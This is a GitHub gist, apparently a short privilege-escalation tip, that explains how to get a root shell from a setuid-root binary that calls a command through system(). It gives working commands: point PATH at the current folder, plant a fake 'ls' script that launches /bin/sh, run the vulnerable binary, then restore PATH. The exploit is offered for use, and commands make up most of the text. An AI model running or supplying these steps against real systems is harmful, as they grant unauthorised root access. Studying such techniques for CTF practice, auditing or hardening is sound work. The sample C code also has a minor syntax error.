Created
January 17, 2019 01:19
-
-
Save zqu4rtz/f1259c77ac062fb7a8ea22284eb2088b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #If you find a script or bin which invokes another command. | |
| #Something like this. (NOTE: Also you can use ltrace or strace to check if a binary calls system libc function) | |
| #include <stdio.h> | |
| int main(void) | |
| { | |
| if(system("ls") != 0) | |
| printf("Error!") | |
| return 0; | |
| } | |
| #And then you see permisions | |
| -rwsr-sr-x 1 root root 6900 Date script | |
| #You can change path erasing folder to original command | |
| #And adding current folder to PATH. | |
| NOTE: Save original PATH to restore after PrivEsc. | |
| echo $PATH > backup.path | |
| export PATH=/home/user/currentfolder | |
| #Create a custom script to get root shell | |
| $ /bin/cat > ls | |
| #!/bin/sh | |
| /bin/sh | |
| (CTRL+D) | |
| $ /bin/chmod +x ls | |
| #Then execute binary: ./vulnerable_binary | |
| #And finally restore PATH | |
| (root)# export PATH=$(/bin/cat backup.path) | |
| #Enjoy this little tip |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment